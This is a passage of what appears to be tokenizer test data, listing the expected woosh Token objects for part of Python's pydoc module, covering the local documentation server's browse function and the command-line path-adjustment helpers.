woosh.Token(woosh.OP, '%', 2687, 57, 2687, 58),
woosh.Token(woosh.OP, '(', 2687, 59, 2687, 60),
woosh.Token(woosh.NAME, 'content_type', 2687, 60, 2687, 72),
woosh.Token(woosh.OP, ',', 2687, 72, 2687, 73),
woosh.Token(woosh.NAME, 'url', 2687, 74, 2687, 77),
woosh.Token(woosh.OP, ')', 2687, 77, 2687, 78),
woosh.Token(woosh.OP, ')', 2687, 78, 2687, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 2687, 79, 2688, 0),
woosh.Token(woosh.DEDENT, '', 2690, 0, 2690, 0),
woosh.Token(woosh.NAME, 'def', 2690, 0, 2690, 3),
woosh.Token(woosh.NAME, 'browse', 2690, 4, 2690, 10),
woosh.Token(woosh.OP, '(', 2690, 10, 2690, 11),
woosh.Token(woosh.NAME, 'port', 2690, 11, 2690, 15),
woosh.Token(woosh.OP, '=', 2690, 15, 2690, 16),
woosh.Token(woosh.NUMBER, '0', 2690, 16, 2690, 17),
woosh.Token(woosh.OP, ',', 2690, 17, 2690, 18),
woosh.Token(woosh.OP, '*', 2690, 19, 2690, 20),
woosh.Token(woosh.OP, ',', 2690, 20, 2690, 21),
woosh.Token(woosh.NAME, 'open_browser', 2690, 22, 2690, 34),
woosh.Token(woosh.OP, '=', 2690, 34, 2690, 35),
woosh.Token(woosh.NAME, 'True', 2690, 35, 2690, 39),
woosh.Token(woosh.OP, ',', 2690, 39, 2690, 40),
woosh.Token(woosh.NAME, 'hostname', 2690, 41, 2690, 49),
woosh.Token(woosh.OP, '=', 2690, 49, 2690, 50),
woosh.Token(woosh.STRING, "'localhost'", 2690, 50, 2690, 61),
woosh.Token(woosh.OP, ')', 2690, 61, 2690, 62),
woosh.Token(woosh.OP, ':', 2690, 62, 2690, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2690, 63, 2691, 0),
woosh.Token(woosh.INDENT, ' ', 2691, 0, 2691, 4),
woosh.Token(woosh.STRING, '"""Start the enhanced pydoc Web server and open a Web browser.\r\n\r\n Use port \'0\' to start the server on an arbitrary port.\r\n Set open_browser to False to suppress opening a browser.\r\n """', 2691, 4, 2695, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2695, 7, 2696, 0),
woosh.Token(woosh.NAME, 'import', 2696, 4, 2696, 10),
woosh.Token(woosh.NAME, 'webbrowser', 2696, 11, 2696, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2696, 21, 2697, 0),
woosh.Token(woosh.NAME, 'serverthread', 2697, 4, 2697, 16),
woosh.Token(woosh.OP, '=', 2697, 17, 2697, 18),
woosh.Token(woosh.NAME, '_start_server', 2697, 19, 2697, 32),
woosh.Token(woosh.OP, '(', 2697, 32, 2697, 33),
woosh.Token(woosh.NAME, '_url_handler', 2697, 33, 2697, 45),
woosh.Token(woosh.OP, ',', 2697, 45, 2697, 46),
woosh.Token(woosh.NAME, 'hostname', 2697, 47, 2697, 55),
woosh.Token(woosh.OP, ',', 2697, 55, 2697, 56),
woosh.Token(woosh.NAME, 'port', 2697, 57, 2697, 61),
woosh.Token(woosh.OP, ')', 2697, 61, 2697, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2697, 62, 2698, 0),
woosh.Token(woosh.NAME, 'if', 2698, 4, 2698, 6),
woosh.Token(woosh.NAME, 'serverthread', 2698, 7, 2698, 19),
woosh.Token(woosh.OP, '.', 2698, 19, 2698, 20),
woosh.Token(woosh.NAME, 'error', 2698, 20, 2698, 25),
woosh.Token(woosh.OP, ':', 2698, 25, 2698, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2698, 26, 2699, 0),
woosh.Token(woosh.INDENT, ' ', 2699, 0, 2699, 8),
woosh.Token(woosh.NAME, 'print', 2699, 8, 2699, 13),
woosh.Token(woosh.OP, '(', 2699, 13, 2699, 14),
woosh.Token(woosh.NAME, 'serverthread', 2699, 14, 2699, 26),
woosh.Token(woosh.OP, '.', 2699, 26, 2699, 27),
woosh.Token(woosh.NAME, 'error', 2699, 27, 2699, 32),
woosh.Token(woosh.OP, ')', 2699, 32, 2699, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2699, 33, 2700, 0),
woosh.Token(woosh.NAME, 'return', 2700, 8, 2700, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 2700, 14, 2701, 0),
woosh.Token(woosh.DEDENT, ' ', 2701, 0, 2701, 4),
woosh.Token(woosh.NAME, 'if', 2701, 4, 2701, 6),
woosh.Token(woosh.NAME, 'serverthread', 2701, 7, 2701, 19),
woosh.Token(woosh.OP, '.', 2701, 19, 2701, 20),
woosh.Token(woosh.NAME, 'serving', 2701, 20, 2701, 27),
woosh.Token(woosh.OP, ':', 2701, 27, 2701, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2701, 28, 2702, 0),
woosh.Token(woosh.INDENT, ' ', 2702, 0, 2702, 8),
woosh.Token(woosh.NAME, 'server_help_msg', 2702, 8, 2702, 23),
woosh.Token(woosh.OP, '=', 2702, 24, 2702, 25),
woosh.Token(woosh.STRING, "'Server commands: [b]rowser, [q]uit'", 2702, 26, 2702, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2702, 62, 2703, 0),
woosh.Token(woosh.NAME, 'if', 2703, 8, 2703, 10),
woosh.Token(woosh.NAME, 'open_browser', 2703, 11, 2703, 23),
woosh.Token(woosh.OP, ':', 2703, 23, 2703, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2703, 24, 2704, 0),
woosh.Token(woosh.INDENT, ' ', 2704, 0, 2704, 12),
woosh.Token(woosh.NAME, 'webbrowser', 2704, 12, 2704, 22),
woosh.Token(woosh.OP, '.', 2704, 22, 2704, 23),
woosh.Token(woosh.NAME, 'open', 2704, 23, 2704, 27),
woosh.Token(woosh.OP, '(', 2704, 27, 2704, 28),
woosh.Token(woosh.NAME, 'serverthread', 2704, 28, 2704, 40),
woosh.Token(woosh.OP, '.', 2704, 40, 2704, 41),
woosh.Token(woosh.NAME, 'url', 2704, 41, 2704, 44),
woosh.Token(woosh.OP, ')', 2704, 44, 2704, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2704, 45, 2705, 0),
woosh.Token(woosh.DEDENT, ' ', 2705, 0, 2705, 8),
woosh.Token(woosh.NAME, 'try', 2705, 8, 2705, 11),
woosh.Token(woosh.OP, ':', 2705, 11, 2705, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2705, 12, 2706, 0),
woosh.Token(woosh.INDENT, ' ', 2706, 0, 2706, 12),
woosh.Token(woosh.NAME, 'print', 2706, 12, 2706, 17),
woosh.Token(woosh.OP, '(', 2706, 17, 2706, 18),
woosh.Token(woosh.STRING, "'Server ready at'", 2706, 18, 2706, 35),
woosh.Token(woosh.OP, ',', 2706, 35, 2706, 36),
woosh.Token(woosh.NAME, 'serverthread', 2706, 37, 2706, 49),
woosh.Token(woosh.OP, '.', 2706, 49, 2706, 50),
woosh.Token(woosh.NAME, 'url', 2706, 50, 2706, 53),
woosh.Token(woosh.OP, ')', 2706, 53, 2706, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2706, 54, 2707, 0),
woosh.Token(woosh.NAME, 'print', 2707, 12, 2707, 17),
woosh.Token(woosh.OP, '(', 2707, 17, 2707, 18),
woosh.Token(woosh.NAME, 'server_help_msg', 2707, 18, 2707, 33),
woosh.Token(woosh.OP, ')', 2707, 33, 2707, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2707, 34, 2708, 0),
woosh.Token(woosh.NAME, 'while', 2708, 12, 2708, 17),
woosh.Token(woosh.NAME, 'serverthread', 2708, 18, 2708, 30),
woosh.Token(woosh.OP, '.', 2708, 30, 2708, 31),
woosh.Token(woosh.NAME, 'serving', 2708, 31, 2708, 38),
woosh.Token(woosh.OP, ':', 2708, 38, 2708, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2708, 39, 2709, 0),
woosh.Token(woosh.INDENT, ' ', 2709, 0, 2709, 16),
woosh.Token(woosh.NAME, 'cmd', 2709, 16, 2709, 19),
woosh.Token(woosh.OP, '=', 2709, 20, 2709, 21),
woosh.Token(woosh.NAME, 'input', 2709, 22, 2709, 27),
woosh.Token(woosh.OP, '(', 2709, 27, 2709, 28),
woosh.Token(woosh.STRING, "'server> '", 2709, 28, 2709, 38),
woosh.Token(woosh.OP, ')', 2709, 38, 2709, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2709, 39, 2710, 0),
woosh.Token(woosh.NAME, 'cmd', 2710, 16, 2710, 19),
woosh.Token(woosh.OP, '=', 2710, 20, 2710, 21),
woosh.Token(woosh.NAME, 'cmd', 2710, 22, 2710, 25),
woosh.Token(woosh.OP, '.', 2710, 25, 2710, 26),
woosh.Token(woosh.NAME, 'lower', 2710, 26, 2710, 31),
woosh.Token(woosh.OP, '(', 2710, 31, 2710, 32),
woosh.Token(woosh.OP, ')', 2710, 32, 2710, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2710, 33, 2711, 0),
woosh.Token(woosh.NAME, 'if', 2711, 16, 2711, 18),
woosh.Token(woosh.NAME, 'cmd', 2711, 19, 2711, 22),
woosh.Token(woosh.OP, '==', 2711, 23, 2711, 25),
woosh.Token(woosh.STRING, "'q'", 2711, 26, 2711, 29),
woosh.Token(woosh.OP, ':', 2711, 29, 2711, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2711, 30, 2712, 0),
woosh.Token(woosh.INDENT, ' ', 2712, 0, 2712, 20),
woosh.Token(woosh.NAME, 'break', 2712, 20, 2712, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2712, 25, 2713, 0),
woosh.Token(woosh.DEDENT, ' ', 2713, 0, 2713, 16),
woosh.Token(woosh.NAME, 'elif', 2713, 16, 2713, 20),
woosh.Token(woosh.NAME, 'cmd', 2713, 21, 2713, 24),
woosh.Token(woosh.OP, '==', 2713, 25, 2713, 27),
woosh.Token(woosh.STRING, "'b'", 2713, 28, 2713, 31),
woosh.Token(woosh.OP, ':', 2713, 31, 2713, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2713, 32, 2714, 0),
woosh.Token(woosh.INDENT, ' ', 2714, 0, 2714, 20),
woosh.Token(woosh.NAME, 'webbrowser', 2714, 20, 2714, 30),
woosh.Token(woosh.OP, '.', 2714, 30, 2714, 31),
woosh.Token(woosh.NAME, 'open', 2714, 31, 2714, 35),
woosh.Token(woosh.OP, '(', 2714, 35, 2714, 36),
woosh.Token(woosh.NAME, 'serverthread', 2714, 36, 2714, 48),
woosh.Token(woosh.OP, '.', 2714, 48, 2714, 49),
woosh.Token(woosh.NAME, 'url', 2714, 49, 2714, 52),
woosh.Token(woosh.OP, ')', 2714, 52, 2714, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2714, 53, 2715, 0),
woosh.Token(woosh.DEDENT, ' ', 2715, 0, 2715, 16),
woosh.Token(woosh.NAME, 'else', 2715, 16, 2715, 20),
woosh.Token(woosh.OP, ':', 2715, 20, 2715, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2715, 21, 2716, 0),
woosh.Token(woosh.INDENT, ' ', 2716, 0, 2716, 20),
woosh.Token(woosh.NAME, 'print', 2716, 20, 2716, 25),
woosh.Token(woosh.OP, '(', 2716, 25, 2716, 26),
woosh.Token(woosh.NAME, 'server_help_msg', 2716, 26, 2716, 41),
woosh.Token(woosh.OP, ')', 2716, 41, 2716, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2716, 42, 2717, 0),
woosh.Token(woosh.DEDENT, ' ', 2717, 0, 2717, 8),
woosh.Token(woosh.DEDENT, '', 2717, 8, 2717, 8),
woosh.Token(woosh.DEDENT, '', 2717, 8, 2717, 8),
woosh.Token(woosh.NAME, 'except', 2717, 8, 2717, 14),
woosh.Token(woosh.OP, '(', 2717, 15, 2717, 16),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 2717, 16, 2717, 33),
woosh.Token(woosh.OP, ',', 2717, 33, 2717, 34),
woosh.Token(woosh.NAME, 'EOFError', 2717, 35, 2717, 43),
woosh.Token(woosh.OP, ')', 2717, 43, 2717, 44),
woosh.Token(woosh.OP, ':', 2717, 44, 2717, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2717, 45, 2718, 0),
woosh.Token(woosh.INDENT, ' ', 2718, 0, 2718, 12),
woosh.Token(woosh.NAME, 'print', 2718, 12, 2718, 17),
woosh.Token(woosh.OP, '(', 2718, 17, 2718, 18),
woosh.Token(woosh.OP, ')', 2718, 18, 2718, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2718, 19, 2719, 0),
woosh.Token(woosh.DEDENT, ' ', 2719, 0, 2719, 8),
woosh.Token(woosh.NAME, 'finally', 2719, 8, 2719, 15),
woosh.Token(woosh.OP, ':', 2719, 15, 2719, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2719, 16, 2720, 0),
woosh.Token(woosh.INDENT, ' ', 2720, 0, 2720, 12),
woosh.Token(woosh.NAME, 'if', 2720, 12, 2720, 14),
woosh.Token(woosh.NAME, 'serverthread', 2720, 15, 2720, 27),
woosh.Token(woosh.OP, '.', 2720, 27, 2720, 28),
woosh.Token(woosh.NAME, 'serving', 2720, 28, 2720, 35),
woosh.Token(woosh.OP, ':', 2720, 35, 2720, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2720, 36, 2721, 0),
woosh.Token(woosh.INDENT, ' ', 2721, 0, 2721, 16),
woosh.Token(woosh.NAME, 'serverthread', 2721, 16, 2721, 28),
woosh.Token(woosh.OP, '.', 2721, 28, 2721, 29),
woosh.Token(woosh.NAME, 'stop', 2721, 29, 2721, 33),
woosh.Token(woosh.OP, '(', 2721, 33, 2721, 34),
woosh.Token(woosh.OP, ')', 2721, 34, 2721, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2721, 35, 2722, 0),
woosh.Token(woosh.NAME, 'print', 2722, 16, 2722, 21),
woosh.Token(woosh.OP, '(', 2722, 21, 2722, 22),
woosh.Token(woosh.STRING, "'Server stopped'", 2722, 22, 2722, 38),
woosh.Token(woosh.OP, ')', 2722, 38, 2722, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2722, 39, 2723, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------------- command-line interface', 2725, 0, 2725, 75),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.DEDENT, '', 2727, 0, 2727, 0),
woosh.Token(woosh.NAME, 'def', 2727, 0, 2727, 3),
woosh.Token(woosh.NAME, 'ispath', 2727, 4, 2727, 10),
woosh.Token(woosh.OP, '(', 2727, 10, 2727, 11),
woosh.Token(woosh.NAME, 'x', 2727, 11, 2727, 12),
woosh.Token(woosh.OP, ')', 2727, 12, 2727, 13),
woosh.Token(woosh.OP, ':', 2727, 13, 2727, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 2727, 14, 2728, 0),
woosh.Token(woosh.INDENT, ' ', 2728, 0, 2728, 4),
woosh.Token(woosh.NAME, 'return', 2728, 4, 2728, 10),
woosh.Token(woosh.NAME, 'isinstance', 2728, 11, 2728, 21),
woosh.Token(woosh.OP, '(', 2728, 21, 2728, 22),
woosh.Token(woosh.NAME, 'x', 2728, 22, 2728, 23),
woosh.Token(woosh.OP, ',', 2728, 23, 2728, 24),
woosh.Token(woosh.NAME, 'str', 2728, 25, 2728, 28),
woosh.Token(woosh.OP, ')', 2728, 28, 2728, 29),
woosh.Token(woosh.NAME, 'and', 2728, 30, 2728, 33),
woosh.Token(woosh.NAME, 'x', 2728, 34, 2728, 35),
woosh.Token(woosh.OP, '.', 2728, 35, 2728, 36),
woosh.Token(woosh.NAME, 'find', 2728, 36, 2728, 40),
woosh.Token(woosh.OP, '(', 2728, 40, 2728, 41),
woosh.Token(woosh.NAME, 'os', 2728, 41, 2728, 43),
woosh.Token(woosh.OP, '.', 2728, 43, 2728, 44),
woosh.Token(woosh.NAME, 'sep', 2728, 44, 2728, 47),
woosh.Token(woosh.OP, ')', 2728, 47, 2728, 48),
woosh.Token(woosh.OP, '>=', 2728, 49, 2728, 51),
woosh.Token(woosh.NUMBER, '0', 2728, 52, 2728, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2728, 53, 2729, 0),
woosh.Token(woosh.DEDENT, '', 2730, 0, 2730, 0),
woosh.Token(woosh.NAME, 'def', 2730, 0, 2730, 3),
woosh.Token(woosh.NAME, '_get_revised_path', 2730, 4, 2730, 21),
woosh.Token(woosh.OP, '(', 2730, 21, 2730, 22),
woosh.Token(woosh.NAME, 'given_path', 2730, 22, 2730, 32),
woosh.Token(woosh.OP, ',', 2730, 32, 2730, 33),
woosh.Token(woosh.NAME, 'argv0', 2730, 34, 2730, 39),
woosh.Token(woosh.OP, ')', 2730, 39, 2730, 40),
woosh.Token(woosh.OP, ':', 2730, 40, 2730, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2730, 41, 2731, 0),
woosh.Token(woosh.INDENT, ' ', 2731, 0, 2731, 4),
woosh.Token(woosh.STRING, '"""Ensures current directory is on returned path, and argv0 directory is not\r\n\r\n Exception: argv0 dir is left alone if it\'s also pydoc\'s directory.\r\n\r\n Returns a new path entry list, or None if no adjustment is needed.\r\n """', 2731, 4, 2736, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2736, 7, 2737, 0),
woosh.Token(woosh.COMMENT, "# Scripts may get the current directory in their path by default if they're", 2737, 4, 2737, 79),
woosh.Token(woosh.COMMENT, '# run with the -m switch, or directly from the current directory.', 2738, 4, 2738, 69),
woosh.Token(woosh.COMMENT, '# The interactive prompt also allows imports from the current directory.', 2739, 4, 2739, 76),
woosh.Token(woosh.COMMENT, "# Accordingly, if the current directory is already present, don't make", 2741, 4, 2741, 74),
woosh.Token(woosh.COMMENT, '# any changes to the given_path', 2742, 4, 2742, 35),
woosh.Token(woosh.NAME, 'if', 2743, 4, 2743, 6),
woosh.Token(woosh.STRING, "''", 2743, 7, 2743, 9),
woosh.Token(woosh.NAME, 'in', 2743, 10, 2743, 12),
woosh.Token(woosh.NAME, 'given_path', 2743, 13, 2743, 23),
woosh.Token(woosh.NAME, 'or', 2743, 24, 2743, 26),
woosh.Token(woosh.NAME, 'os', 2743, 27, 2743, 29),
woosh.Token(woosh.OP, '.', 2743, 29, 2743, 30),
woosh.Token(woosh.NAME, 'curdir', 2743, 30, 2743, 36),
woosh.Token(woosh.NAME, 'in', 2743, 37, 2743, 39),
woosh.Token(woosh.NAME, 'given_path', 2743, 40, 2743, 50),
woosh.Token(woosh.NAME, 'or', 2743, 51, 2743, 53),
woosh.Token(woosh.NAME, 'os', 2743, 54, 2743, 56),
woosh.Token(woosh.OP, '.', 2743, 56, 2743, 57),
woosh.Token(woosh.NAME, 'getcwd', 2743, 57, 2743, 63),
woosh.Token(woosh.OP, '(', 2743, 63, 2743, 64),
woosh.Token(woosh.OP, ')', 2743, 64, 2743, 65),
woosh.Token(woosh.NAME, 'in', 2743, 66, 2743, 68),
woosh.Token(woosh.NAME, 'given_path', 2743, 69, 2743, 79),
woosh.Token(woosh.OP, ':', 2743, 79, 2743, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 2743, 80, 2744, 0),
woosh.Token(woosh.INDENT, ' ', 2744, 0, 2744, 8),
woosh.Token(woosh.NAME, 'return', 2744, 8, 2744, 14),
woosh.Token(woosh.NAME, 'None', 2744, 15, 2744, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2744, 19, 2745, 0),
woosh.Token(woosh.COMMENT, '# Otherwise, add the current directory to the given path, and remove the', 2746, 4, 2746, 76),
woosh.Token(woosh.COMMENT, "# script directory (as long as the latter isn't also pydoc's directory.", 2747, 4, 2747, 75),
woosh.Token(woosh.DEDENT, ' ', 2748, 0, 2748, 4),
woosh.Token(woosh.NAME, 'stdlib_dir', 2748, 4, 2748, 14),
woosh.Token(woosh.OP, '=', 2748, 15, 2748, 16),
woosh.Token(woosh.NAME, 'os', 2748, 17, 2748, 19),
woosh.Token(woosh.OP, '.', 2748, 19, 2748, 20),
woosh.Token(woosh.NAME, 'path', 2748, 20, 2748, 24),
woosh.Token(woosh.OP, '.', 2748, 24, 2748, 25),
woosh.Token(woosh.NAME, 'dirname', 2748, 25, 2748, 32),
woosh.Token(woosh.OP, '(', 2748, 32, 2748, 33),
woosh.Token(woosh.NAME, '__file__', 2748, 33, 2748, 41),
woosh.Token(woosh.OP, ')', 2748, 41, 2748, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2748, 42, 2749, 0),
woosh.Token(woosh.NAME, 'script_dir', 2749, 4, 2749, 14),
woosh.Token(woosh.OP, '=', 2749, 15, 2749, 16),
woosh.Token(woosh.NAME, 'os', 2749, 17, 2749, 19),
woosh.Token(woosh.OP, '.', 2749, 19, 2749, 20),
woosh.Token(woosh.NAME, 'path', 2749, 20, 2749, 24),
woosh.Token(woosh.OP, '.', 2749, 24, 2749, 25),
woosh.Token(woosh.NAME, 'dirname', 2749, 25, 2749, 32),
woosh.Token(woosh.OP, '(', 2749, 32, 2749, 33),
woosh.Token(woosh.NAME, 'argv0', 2749, 33, 2749, 38),
woosh.Token(woosh.OP, ')', 2749, 38, 2749, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2749, 39, 2750, 0),
woosh.Token(woosh.NAME, 'revised_path', 2750, 4, 2750, 16),
woosh.Token(woosh.OP, '=', 2750, 17, 2750, 18),
woosh.Token(woosh.NAME, 'given_path', 2750, 19, 2750, 29),
woosh.Token(woosh.OP, '.', 2750, 29, 2750, 30),
woosh.Token(woosh.NAME, 'copy', 2750, 30, 2750, 34),
woosh.Token(woosh.OP, '(', 2750, 34, 2750, 35),
woosh.Token(woosh.OP, ')', 2750, 35, 2750, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2750, 36, 2751, 0),
woosh.Token(woosh.NAME, 'if', 2751, 4, 2751, 6),
woosh.Token(woosh.NAME, 'script_dir', 2751, 7, 2751, 17),
woosh.Token(woosh.NAME, 'in', 2751, 18, 2751, 20),
woosh.Token(woosh.NAME, 'given_path', 2751, 21, 2751, 31),
woosh.Token(woosh.NAME, 'and', 2751, 32, 2751, 35),
woosh.Token(woosh.NAME, 'not', 2751, 36, 2751, 39),
woosh.Token(woosh.NAME, 'os', 2751, 40, 2751, 42),
woosh.Token(woosh.OP, '.', 2751, 42, 2751, 43),
woosh.Token(woosh.NAME, 'path', 2751, 43, 2751, 47),
woosh.Token(woosh.OP, '.', 2751, 47, 2751, 48),
woosh.Token(woosh.NAME, 'samefile', 2751, 48, 2751, 56),
woosh.Token(woosh.OP, '(', 2751, 56, 2751, 57),
woosh.Token(woosh.NAME, 'script_dir', 2751, 57, 2751, 67),
woosh.Token(woosh.OP, ',', 2751, 67, 2751, 68),
woosh.Token(woosh.NAME, 'stdlib_dir', 2751, 69, 2751, 79),
woosh.Token(woosh.OP, ')', 2751, 79, 2751, 80),
woosh.Token(woosh.OP, ':', 2751, 80, 2751, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 2751, 81, 2752, 0),
woosh.Token(woosh.INDENT, ' ', 2752, 0, 2752, 8),
woosh.Token(woosh.NAME, 'revised_path', 2752, 8, 2752, 20),
woosh.Token(woosh.OP, '.', 2752, 20, 2752, 21),
woosh.Token(woosh.NAME, 'remove', 2752, 21, 2752, 27),
woosh.Token(woosh.OP, '(', 2752, 27, 2752, 28),
woosh.Token(woosh.NAME, 'script_dir', 2752, 28, 2752, 38),
woosh.Token(woosh.OP, ')', 2752, 38, 2752, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2752, 39, 2753, 0),
woosh.Token(woosh.DEDENT, ' ', 2753, 0, 2753, 4),
woosh.Token(woosh.NAME, 'revised_path', 2753, 4, 2753, 16),
woosh.Token(woosh.OP, '.', 2753, 16, 2753, 17),
woosh.Token(woosh.NAME, 'insert', 2753, 17, 2753, 23),
woosh.Token(woosh.OP, '(', 2753, 23, 2753, 24),
woosh.Token(woosh.NUMBER, '0', 2753, 24, 2753, 25),
woosh.Token(woosh.OP, ',', 2753, 25, 2753, 26),
woosh.Token(woosh.NAME, 'os', 2753, 27, 2753, 29),
woosh.Token(woosh.OP, '.', 2753, 29, 2753, 30),
woosh.Token(woosh.NAME, 'getcwd', 2753, 30, 2753, 36),
woosh.Token(woosh.OP, '(', 2753, 36, 2753, 37),
woosh.Token(woosh.OP, ')', 2753, 37, 2753, 38),
woosh.Token(woosh.OP, ')', 2753, 38, 2753, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2753, 39, 2754, 0),
woosh.Token(woosh.NAME, 'return', 2754, 4, 2754, 10),
woosh.Token(woosh.NAME, 'revised_path', 2754, 11, 2754, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2754, 23, 2755, 0),
woosh.Token(woosh.COMMENT, '# Note: the tests only cover _get_revised_path, not _adjust_cli_path itself', 2757, 0, 2757, 75),
woosh.Token(woosh.DEDENT, '', 2758, 0, 2758, 0),
woosh.Token(woosh.NAME, 'def', 2758, 0, 2758, 3),
woosh.Token(woosh.NAME, '_adjust_cli_sys_path', 2758, 4, 2758, 24),
woosh.Token(woosh.OP, '(', 2758, 24, 2758, 25),
woosh.Token(woosh.OP, ')', 2758, 25, 2758, 26),
woosh.Token(woosh.OP, ':', 2758, 26, 2758, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2758, 27, 2759, 0),
woosh.Token(woosh.INDENT, ' ', 2759, 0, 2759, 4),
woosh.Token(woosh.STRING, '"""Ensures current directory is on sys.path, and __main__ directory is not.\r\n\r\n Exception: __main__ dir is left alone if it\'s also pydoc\'s directory.\r\n """', 2759, 4, 2762, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2762, 7, 2763, 0),
woosh.Token(woosh.NAME, 'revised_path', 2763, 4, 2763, 16),
woosh.Token(woosh.OP, '=', 2763, 17, 2763, 18),
woosh.Token(woosh.NAME, '_get_revised_path', 2763, 19, 2763, 36),
woosh.Token(woosh.OP, '(', 2763, 36, 2763, 37),
woosh.Token(woosh.NAME, 'sys', 2763, 37, 2763, 40),
woosh.Token(woosh.OP, '.', 2763, 40, 2763, 41),
woosh.Token(woosh.NAME, 'path', 2763, 41, 2763, 45),
woosh.Token(woosh.OP, ',', 2763, 45, 2763, 46),
woosh.Token(woosh.NAME, 'sys', 2763, 47, 2763, 50),
woosh.Token(woosh.OP, '.', 2763, 50, 2763, 51),
woosh.Token(woosh.NAME, 'argv', 2763, 51, 2763, 55),
woosh.Token(woosh.OP, '[', 2763, 55, 2763, 56),
woosh.Token(woosh.NUMBER, '0', 2763, 56, 2763, 57),
woosh.Token(woosh.OP, ']', 2763, 57, 2763, 58),
woosh.Token(woosh.OP, ')', 2763, 58, 2763, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2763, 59, 2764, 0),
woosh.Token(woosh.NAME, 'if', 2764, 4, 2764, 6),
woosh.Token(woosh.NAME, 'revised_path', 2764, 7, 2764, 19),
woosh.Token(woosh.NAME, 'is', 2764, 20, 2764, 22),
woosh.Token(woosh.NAME, 'not', 2764, 23, 2764, 26),
woosh.Token(woosh.NAME, 'None', 2764, 27, 2764, 31),
woosh.Token(woosh.OP, ':', 2764, 31, 2764, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2764, 32, 2765, 0),
woosh.Token(woosh.INDENT, ' ', 2765, 0, 2765, 8),
woosh.Token(woosh.NAME, 'sys', 2765, 8, 2765, 11),
woosh.Token(woosh.OP, '.', 2765, 11, 2765, 12),
woosh.Token(woosh.NAME, 'path', 2765, 12, 2765, 16),
woosh.Token(woosh.OP, '[', 2765, 16, 2765, 17),
woosh.Token(woosh.OP, ':', 2765, 17, 2765, 18),
woosh.Token(woosh.OP, ']', 2765, 18, 2765, 19),
woosh.Token(woosh.OP, '=', 2765, 20, 2765, 21),
woosh.Token(woosh.NAME, 'revised_path', 2765, 22, 2765, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2765, 34, 2766, 0),
woosh.Token(woosh.DEDENT, '', 2768, 0, 2768, 0),
woosh.Token(woosh.DEDENT, '', 2768, 0, 2768, 0),
woosh.Token(woosh.NAME, 'def', 2768, 0, 2768, 3),
woosh.Token(woosh.NAME, 'cli', 2768, 4, 2768, 7),
woosh.Token(woosh.OP, '(', 2768, 7, 2768, 8),
woosh.Token(woosh.OP, ')', 2768, 8, 2768, 9),
woosh.Token(woosh.OP, ':', 2768, 9, 2768, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 2768, 10, 2769, 0),
woosh.Token(woosh.INDENT, ' ', 2769, 0, 2769, 4),
woosh.Token(woosh.STRING, '"""Command-line interface (looks at sys.argv to decide what to do)."""', 2769, 4, 2769, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 2769, 74, 2770, 0),
woosh.Token(woosh.NAME, 'import', 2770, 4, 2770, 10),
woosh.Token(woosh.NAME, 'getopt', 2770, 11, 2770, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2770, 17, 2771, 0),
woosh.Token(woosh.NAME, 'class', 2771, 4, 2771, 9),
woosh.Token(woosh.NAME, 'BadUsage', 2771, 10, 2771, 18),
woosh.Token(woosh.OP, '(', 2771, 18, 2771, 19),
woosh.Token(woosh.NAME, 'Exception', 2771, 19, 2771, 28),
woosh.Token(woosh.OP, ')', 2771, 28, 2771, 29),
woosh.Token(woosh.OP, ':', 2771, 29, 2771, 30),
woosh.Token(woosh.NAME, 'pass', 2771, 31, 2771, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2771, 35, 2772, 0),
woosh.Token(woosh.NAME, '_adjust_cli_sys_path', 2773, 4, 2773, 24),
